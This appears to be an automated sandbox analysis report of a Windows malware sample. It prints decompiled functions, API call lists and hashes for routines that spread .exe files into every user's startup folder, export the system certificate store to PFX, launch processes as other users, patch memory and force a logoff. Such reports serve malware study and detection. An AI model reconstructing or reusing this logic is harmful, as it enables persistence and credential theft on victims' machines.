Download Yara Rule

C-Code - Quality: 89%

			E0040716E(void* __ecx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v536;
				void* _v540;
				char _v544;
				char _v644;
				signed char _v648;
				char _v748;
				short _v760;
				char _v764;
				short _v772;
				int _v776;
				int _v780;
				void _v781;
				void* _v784;
				char _v785;
				void _v788;
				void _v789;
				void* _v792;
				char _v793;
				char _v797;
				void* _v800;
				void* _v804;
				void* _v808;
				char _v809;
				int _v813;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t74;
				int _t79;
				intOrPtr* _t80;
				int _t82;
				void* _t84;
				int _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				int _t130;
				void* _t145;
				void* _t147;

				_t136 = __ecx;
				_t149 =  &_v764;
				_v781 = 0;
				if(E004160D5(0, __ecx,  &_v764,  *0x41e5ec) != 0) {
					_v780 = _v760;
					_t130 = E00406E6B( &_v780, __ecx, _v764);
					_v776 = _t130;
					if(_t130 == 0) {
						_v780 = 0;
					}
					E0041617D( &_v764);
				}
				if(_v780 != 0x1e6) {
					__eflags = _v780 - 0xc;
					if(__eflags != 0) {
						L41:
						E00411106(_v772);
						return _v785;
					}
					_t74 = E004069FD(_t136, __eflags, 0xf3f22264, 2);
					_v776 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags = _a8 - 1;
						if(_a8 == 1) {
							E00412B6B(0, _t149,  *0x41e5ec);
						}
						goto L41;
					}
					E004069C2(0x5ef893a3,  &_v748, 1);
					_t79 = E004147C3( &_v760);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x41e594; // 0x0
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							_v789 = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149,  &_v789, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)(_v780 + 4)));
								_t84 = E0041733C(_t136, E00404E04,  *((intOrPtr*)(_v780 + 8)));
								_t149 = 0x41e5f0;
								_v797 = E00404E04(_t84, 0, 0x41e5f0);
								L30:
								__eflags = _v793 - 1;
								if(_v793 == 1) {
									_t88 = E004129CD( &_v536, 0, _t149, 0,  &_v776);
									__eflags = _t88;
									_v813 = _t88 != 0;
									__eflags = _v813;
									if(_v813 != 0) {
										E004069C2(0x18a9042b,  &_v760, 1);
										_t92 = CreateEventW(0x41e5c8, 1, 0,  &_v772);
										_t145 = _v788;
										_v804 = _t92;
										_v800 = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2,  &_v792, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags = _v792;
										if(_v792 != 0) {
											CloseHandle(_v792);
										}
										CloseHandle(_v772);
										CloseHandle(_t145);
									}
								}
								L38:
								E004147B3(_v780);
								goto L39;
							}
							__eflags = _v789 - 0xe9;
							if(_v789 != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x41e9fe, 0xf93f4793,  &_v788);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)(_v784 + 4)));
							E0041733C(_t136, E00405170,  *_v784);
							_push(_a4);
							_t149 = 0x41e5f0;
							_push( &_v544);
							_v809 = E00405170( &_v544, 0x41e5f0);
							VirtualFree(_v808, 0, 0x8000);
							goto L30;
						}
						_v789 = E004054D0(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						_v781 = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149,  &_v781, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags = _v781 - 0xe9;
						if(_v781 == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x320);
					}
				}
				if(E004050B9(_t136, _v772) != 0) {
					E004069C2(0x4f164cf2,  &_v748, 1);
					_t113 = CreateMutexW(0x41e5c8, 1,  &_v760);
					_v792 = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle(_v780);
							_v780 = 0;
						}
						if(_v780 != 0) {
							E00404956(_t136,  &_v644);
							if((_v648 & 0x00000020) != 0) {
								 *0x41e590 =  *0x41e590 | 0x00000010;
							}
							E0040CC7E();
							if(( *0x41e590 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E004069C2(0x18a9042b,  &_v748, 1);
							_t147 = OpenEventW(2, 0,  &_v760);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E00406F28(1);
							_v785 = 1;
							CloseHandle(_v784);
						}
					}
				}
				goto L41;
			}

0x0040716e
0x00407187
0x0040718b
0x00407196
0x004071a0
0x004071a8
0x004071ad
0x004071b3
0x004071b5
0x004071b5
0x004071bd
0x004071bd
0x004071ca
0x004072b6
0x004072bb
0x0040749f
0x004074a3
0x004074b2
0x004074b2
0x004072c8
0x004072cd
0x004072d1
0x004072d3
0x0040748e
0x0040748e
0x00407492
0x0040749a
0x0040749a
0x00000000
0x00407492
0x004072e5
0x004072ef
0x004072f4
0x00407300
0x00407302
0x0040732d
0x0040732d
0x00407336
0x0040733c
0x0040733f
0x0040735a
0x0040735e
0x00407360
0x00407362
0x004073c5
0x004073c9
0x004073d4
0x004073d9
0x004073ec
0x004073f0
0x004073f0
0x004073f5
0x0040740b
0x00407410
0x00407412
0x00407417
0x0040741b
0x00407429
0x0040743b
0x00407441
0x00407445
0x00407449
0x0040744d
0x0040744f
0x00407451
0x00407464
0x00407453
0x00407454
0x00407454
0x0040746a
0x00407470
0x00407474
0x0040747a
0x0040747a
0x00407480
0x00407483
0x00407483
0x0040741b
0x00407485
0x00407489
0x00000000
0x00407489
0x00407364
0x00407369
0x00000000
0x00000000
0x0040737a
0x0040737c
0x0040737f
0x00000000
0x00000000
0x00407385
0x0040738f
0x00407394
0x004073a2
0x004073a7
0x004073b9
0x004073bd
0x00000000
0x004073bd
0x00407346
0x00000000
0x00000000
0x00000000
0x00000000
0x00407304
0x00407304
0x0040730f
0x00407313
0x00407315
0x00407317
0x00000000
0x00000000
0x00407319
0x0040731e
0x00000000
0x00000000
0x00407320
0x00407325
0x00407325
0x00407304
0x004071db
0x004071ed
0x004071fe
0x00407204
0x0040720a
0x00407221
0x00407227
0x00407229
0x00407229
0x00407231
0x0040723f
0x0040724c
0x0040724e
0x0040724e
0x00407255
0x00407261
0x0040726a
0x0040726a
0x0040727c
0x0040728f
0x00407293
0x00407296
0x0040729d
0x0040729d
0x004072a1
0x004072aa
0x004072af
0x004072af
0x00407231
0x0040720a
0x00000000

APIs

Part of subcall function 004160D5: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,00407194,?,?,00000000), ref: 004160FA
Part of subcall function 004160D5: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00407194,?,?,00000000), ref: 0041610D

CreateMutexW.KERNEL32(0041E5C8,00000001,?,4F164CF2,?,00000001,?), ref: 004071FE
GetLastError.KERNEL32 ref: 00407210
CloseHandle.KERNEL32(000001E6), ref: 00407227
ExitWindowsEx.USER32(00000014,80000000), ref: 0040726A
OpenEventW.KERNEL32(00000002,00000000,?,18A9042B,?,00000001), ref: 00407289
SetEvent.KERNEL32(00000000), ref: 00407296
CloseHandle.KERNEL32(00000000), ref: 0040729D
CloseHandle.KERNEL32(000001E6,00000001), ref: 004072AF
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000002,00000001,00000000,?,5EF893A3,?,00000001,F3F22264,00000002), ref: 00407313
Sleep.KERNEL32(00000320), ref: 00407325
IsWellKnownSid.ADVAPI32(00000000,00000016,?,5EF893A3,?,00000001,F3F22264,00000002), ref: 00407336
ReadProcessMemory.KERNEL32(000000FF,74B5F9B0,00000000,00000001,00000000), ref: 0040735E
VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004073BD
GetFileAttributesExW.KERNEL32(0041E9FE,F93F4793,0000000C), ref: 0040737A

Part of subcall function 0041733C: VirtualProtect.KERNEL32(00404E04,?,00000040,00000000,74B5F9B0,?,?,004073D9,?,?), ref: 00417351
Part of subcall function 0041733C: VirtualProtect.KERNEL32(00404E04,?,00000000,00000000,?,?,004073D9,?,?), ref: 00417384

Part of subcall function 00405170: lstrcmpiW.KERNEL32(?,004073AF,?,00000001,?,?), ref: 00405159

CreateEventW.KERNEL32(0041E5C8,00000001,00000000,?,18A9042B,?,00000001,00000001,?,00000000,0041E5F0,00000000,?,?,?), ref: 0040743B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407454
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00407464
CloseHandle.KERNEL32(0000000C), ref: 0040747A
CloseHandle.KERNEL32(?), ref: 00407480
CloseHandle.KERNEL32(?), ref: 00407483

Strings

, xrefs: 00407244

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindowslstrcmpi
String ID:
API String ID: 1256398583-3916222277
Opcode ID: a60166e17a67fd9d8af91a01021ddc3db473ee4acf7924f7616fbb16fa1c4e0d
Instruction ID: b01ae29f356be0270103fccafa78031ce2622bd96157ef09aa32b8ff476147dd
Opcode Fuzzy Hash: a60166e17a67fd9d8af91a01021ddc3db473ee4acf7924f7616fbb16fa1c4e0d
Instruction Fuzzy Hash: F291B071908345AFD710EF618D45E9F7FE8AB88314F00493EF984A22E2D7789958CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00414CC6, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414CC6() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t7;
				void* _t9;

				if( *0x41fe74 != 0) {
					L9:
					 *0x41fe74 =  *0x41fe74 + 1;
					return 1;
				} else {
					_t2 = LoadLibraryA("cabinet.dll");
					 *0x41fe70 = _t2;
					if(_t2 == 0) {
						L8:
						return 0;
					} else {
						 *0x41f49c = GetProcAddress(_t2, "FCICreate");
						 *0x41fe60 = GetProcAddress( *0x41fe70, "FCIAddFile");
						 *0x41f094 = GetProcAddress( *0x41fe70, "FCIFlushCabinet");
						_t7 = GetProcAddress( *0x41fe70, "FCIDestroy");
						 *0x41fe68 = _t7;
						if( *0x41f49c == 0 ||  *0x41fe60 == 0 ||  *0x41f094 == 0 || _t7 == 0) {
							L7:
							FreeLibrary( *0x41fe70);
							goto L8;
						} else {
							_t9 = HeapCreate(0, 0x80000, 0);
							 *0x41f090 = _t9;
							if(_t9 != 0) {
								goto L9;
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x00414ccf
0x00414d7a
0x00414d7a
0x00414d83
0x00414cd5
0x00414cda
0x00414ce0
0x00414ce7
0x00414d76
0x00414d79
0x00414ced
0x00414d07
0x00414d19
0x00414d2b
0x00414d30
0x00414d32
0x00414d3e
0x00414d6a
0x00414d70
0x00000000
0x00414d54
0x00414d5b
0x00414d61
0x00414d68
0x00000000
0x00000000
0x00000000
0x00000000
0x00414d68
0x00414d3e
0x00414ce7

APIs

LoadLibraryA.KERNEL32(cabinet.dll,00000000,00414DAD,?,00414FC9,?,?,00000000,?,?), ref: 00414CDA
GetProcAddress.KERNEL32(00000000,FCICreate), ref: 00414CFA
GetProcAddress.KERNEL32(FCIAddFile), ref: 00414D0C
GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 00414D1E
GetProcAddress.KERNEL32(FCIDestroy), ref: 00414D30
HeapCreate.KERNEL32(00000000,00080000,00000000,00414FC9,?,?,00000000,?,?), ref: 00414D5B
FreeLibrary.KERNEL32(00414FC9,?,?,00000000,?,?), ref: 00414D70

Strings

FCICreate, xrefs: 00414CF4
cabinet.dll, xrefs: 00414CD5
FCIAddFile, xrefs: 00414CFC
FCIDestroy, xrefs: 00414D20
FCIFlushCabinet, xrefs: 00414D0E

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$CreateFreeHeapLoad
String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
API String ID: 2040708800-1163896595
Opcode ID: 40ad21179cc0d0d57515cc7f1e056a5fa796b7adb53692985f17ebad144cee0c
Instruction ID: 42619e3df030fa642841065636bc994e2d2a8913b0e9a6fcf823fb982b3f698d
Opcode Fuzzy Hash: 40ad21179cc0d0d57515cc7f1e056a5fa796b7adb53692985f17ebad144cee0c
Instruction Fuzzy Hash: 69115E74940B10DACB219F75BC05AD63E61B7EA7213208737E608A2271E7BA048BCE4D

Uniqueness

Uniqueness Score: -1.00%

Function 004054D0, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004054D0(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E0040CA33(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E0040C9FD(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E00411C55(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E004114A7(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E00407A1F( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E00416745( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E004164C7( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E0041545F(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E00404BCF( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E00404CFC( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E0041545F(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E00404BCF(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x004054de
0x004054e6
0x004054e9
0x004054f7
0x004054fb
0x00405598
0x00000000
0x00405501
0x00405501
0x00405509
0x00405512
0x0040551a
0x0040551f
0x00405520
0x00405526
0x00405527
0x00405533
0x00405535
0x00405543
0x0040554b
0x0040554d
0x00405553
0x00405559
0x0040556e
0x00405573
0x00405583
0x00405588
0x00405588
0x0040556e
0x0040554b
0x00405533
0x0040558d
0x00405596
0x0040559f
0x004055a2
0x004055a5
0x004055aa
0x004055c0
0x004055c3
0x004055c9
0x004055cc
0x004055ce
0x004055db
0x004055db
0x004055de
0x00000000
0x00000000
0x004055e4
0x004055e6
0x004055e9
0x004056a5
0x004056a8
0x00000000
0x00000000
0x00000000
0x00000000
0x004055ef
0x004055ef
0x004055fc
0x00405602
0x00405604
0x0040560a
0x0040560d
0x0040560f
0x00405615
0x0040561f
0x00405624
0x00405626
0x00405636
0x0040563b
0x0040563d
0x00405646
0x0040564b
0x0040564d
0x00405666
0x00405668
0x00405678
0x0040567a
0x00405689
0x0040568d
0x0040568d
0x0040567a
0x00405668
0x0040564d
0x0040563d
0x00405695
0x00405695
0x0040560f
0x0040569b
0x0040569c
0x0040569c
0x00000000
0x004055ef
0x004055d0
0x004055d5
0x00000000
0x00000000
0x00000000
0x004056ae
0x004056ae
0x004056ae
0x004056bb
0x004056cc
0x004056d2
0x004056d4
0x004056ed
0x004056ef
0x004056fa
0x004056ff
0x00405701
0x00405703
0x00405703
0x00405701
0x004056ef
0x00000000
0x00405707
0x00000000
0x00405596

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 004054F1
GetProcAddress.KERNEL32(00000000,?), ref: 00405512
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00405543
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00405566
FreeLibrary.KERNEL32(00000000), ref: 0040558D
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 004055C3
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004055FC
NetApiBufferFree.NETAPI32(?,?,?), ref: 00405695
NetApiBufferFree.NETAPI32(?), ref: 004056A8
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 004056CC

Strings

.exe, xrefs: 004055A5, 00405651, 004056D8

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: 5bfb45865e912f606f096a2f89e5b46878cd5fb620fb21273b726c69df47988a
Instruction ID: c3020d851ccc26ff2fbd83f29f49db3501f5d447b743aa2e7efefd50582d58cf
Opcode Fuzzy Hash: 5bfb45865e912f606f096a2f89e5b46878cd5fb620fb21273b726c69df47988a
Instruction Fuzzy Hash: 51618FB1900618BEDF20DBA4CD84EEF77BDEB45304F0045BAE516F3191E63A9A458F68

Uniqueness

Uniqueness Score: -1.00%

Function 00412A28, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00412A28(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E004111B9( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x00412a36
0x00412a39
0x00412a3f
0x00412a44
0x00412a62
0x00412a64
0x00412a66
0x00412a6b
0x00412a79
0x00412a7a
0x00412a80
0x00412a81
0x00412a88
0x00412a8a
0x00412a8a
0x00412a8f
0x00412a93
0x00412a9c
0x00412aa1
0x00412aa4
0x00412aa7
0x00412aac
0x00412aae
0x00412aae
0x00412ac0
0x00412add
0x00412ae8
0x00412aed
0x00412af2
0x00412af2
0x00412af9
0x00412afe
0x00412afe
0x00412af9
0x00412b04
0x00412b0b
0x00412b12

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00412A39
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00412A58
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00412A64
CreateProcessAsUserW.ADVAPI32(?,00000000,00404CDF,00000000,00000000,00000000,00404CDF,00404CDF,00000000,?,?,?,00000000,00000044), ref: 00412AD5
CloseHandle.KERNEL32(?), ref: 00412AE8
CloseHandle.KERNEL32(?), ref: 00412AED
FreeLibrary.KERNEL32(?), ref: 00412B04

Strings

userenv.dll, xrefs: 00412A31
CreateEnvironmentBlock, xrefs: 00412A52
DestroyEnvironmentBlock, xrefs: 00412A5A

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 953ce3b63382c2c1c06d1cce245669a77c3f945d6333d5eb825670dd553495e1
Instruction ID: 071d21bc6105e380eaf32e00cad22d89230e94e024edf5a20d1654d08ddf1f32
Opcode Fuzzy Hash: 953ce3b63382c2c1c06d1cce245669a77c3f945d6333d5eb825670dd553495e1
Instruction Fuzzy Hash: 872138B2D0021DAFDF119FE5CD84DEEBBBCEB48344B10846AE501F2160D6799D54CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040760C, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004030F4), ref: 00407627
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00407643
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0040764F
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0040768E
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 004076BE
CharLowerW.USER32 ref: 004076DC
GetSystemTime.KERNEL32(?), ref: 004076E7
CertCloseStore.CRYPT32(?,00000000), ref: 00407770

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 4206e53aa1f201fa251bdefe66059e2c7e0011a6bb500393fd4e1cd4083f39cd
Instruction ID: f17d779ae3f930988307aed512631a89c7cf389f71526a299710c20dc0180d40
Opcode Fuzzy Hash: 4206e53aa1f201fa251bdefe66059e2c7e0011a6bb500393fd4e1cd4083f39cd
Instruction Fuzzy Hash: B141C671508341ABD710AF65CD81EABBBDCAB88744F00093FB684E32A0D638ED458767

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC7E, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC7E() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v588;
				void* _v596;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t56;
				intOrPtr* _t57;
				void** _t59;
				void** _t60;
				void** _t62;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
					_v20 = _t42;
					_v24 = _t71;
					if(_t42 == 0xffffffff) {
						break;
					} else {
						_t45 =  &_v596;
						_v596 = 0x22c;
						Process32FirstW(_v20, _t45);
					}
					while(_t45 != 0) {
						_t65 = _v588;
						__eflags = _t65 - _t71;
						if(_t65 <= _t71) {
							L20:
							_t45 = Process32NextW(_v20,  &_v596);
							continue;
						}
						__eflags = _t65 -  *0x41e800; // 0x0
						if(__eflags == 0) {
							goto L20;
						}
						_t47 = 0;
						__eflags = _v12 - _t71;
						if(_v12 <= _t71) {
							L8:
							_t48 = E00406946(_t65, _t70, _t65);
							_v28 = _t48;
							__eflags = _t48 - _t71;
							if(_t48 == _t71) {
								goto L20;
							}
							_t73 = OpenProcess(0x400, _t71, _v588);
							__eflags = _t73 - _t71;
							if(_t73 == _t71) {
								L19:
								CloseHandle(_v28);
								goto L20;
							}
							_t72 = E0041271D(_t65, _t73,  &_v32);
							CloseHandle(_t73);
							__eflags = _t72;
							if(_t72 == 0) {
								L18:
								_t71 = 0;
								__eflags = 0;
								goto L19;
							} else {
								__eflags = _v32 -  *0x41e5a0; // 0x0
								if(__eflags == 0) {
									_t56 = GetLengthSid( *_t72);
									__eflags = _t56 -  *0x41e598;
									if(_t56 ==  *0x41e598) {
										_t57 =  *0x41e594; // 0x0
										_t59 = E00411177( *_t57,  *_t72, _t56);
										__eflags = _t59;
										if(_t59 == 0) {
											_t60 = E00411091(4 + _v12 * 4,  &_v16);
											__eflags = _t60;
											if(_t60 != 0) {
												_t70 = _v12;
												_v12 = _v12 + 1;
												_v24 = _v24 + 1;
												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
												_t62 = E0040CBF5(_v16, _v588, _v28);
												__eflags = _t62;
												if(_t62 != 0) {
													_v5 = 1;
												}
											}
										}
									}
								}
								E00411106(_t72);
								goto L18;
							}
						} else {
							goto L6;
						}
						while(1) {
							L6:
							_t70 = _v16;
							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
								goto L20;
							}
							_t47 = _t47 + 1;
							__eflags = _t47 - _v12;
							if(_t47 < _v12) {
								continue;
							}
							goto L8;
						}
						goto L20;
					}
					CloseHandle(_v20);
					if(_v24 != _t71) {
						continue;
					}
					break;
				}
				E00411106(_v16);
				return _v5;
			}

0x0040cc90
0x0040cc92
0x0040cc96
0x0040cc99
0x0040cc9c
0x0040cc9f
0x0040cca5
0x0040cca8
0x0040ccae
0x00000000
0x0040ccb4
0x0040ccb4
0x0040ccbe
0x0040ccc8
0x0040ccc8
0x0040cdd2
0x0040ccd3
0x0040ccd9
0x0040ccdb
0x0040cdc2
0x0040cdcc
0x00000000
0x0040cdcc
0x0040cce1
0x0040cce7
0x00000000
0x00000000
0x0040cced
0x0040ccef
0x0040ccf2
0x0040cd06
0x0040cd07
0x0040cd0c
0x0040cd0f
0x0040cd11
0x00000000
0x00000000
0x0040cd29
0x0040cd2b
0x0040cd2d
0x0040cdbd
0x0040cdc0
0x00000000
0x0040cdc0
0x0040cd3e
0x0040cd40
0x0040cd42
0x0040cd44
0x0040cdbb
0x0040cdbb
0x0040cdbb
0x00000000
0x0040cd46
0x0040cd49
0x0040cd4f
0x0040cd53
0x0040cd59
0x0040cd5f
0x0040cd64
0x0040cd6b
0x0040cd70
0x0040cd72
0x0040cd81
0x0040cd86
0x0040cd88
0x0040cd8a
0x0040cd99
0x0040cd9c
0x0040cd9f
0x0040cda8
0x0040cdad
0x0040cdaf
0x0040cdb1
0x0040cdb1
0x0040cdaf
0x0040cd88
0x0040cd72
0x0040cd5f
0x0040cdb6
0x00000000
0x0040cdb6
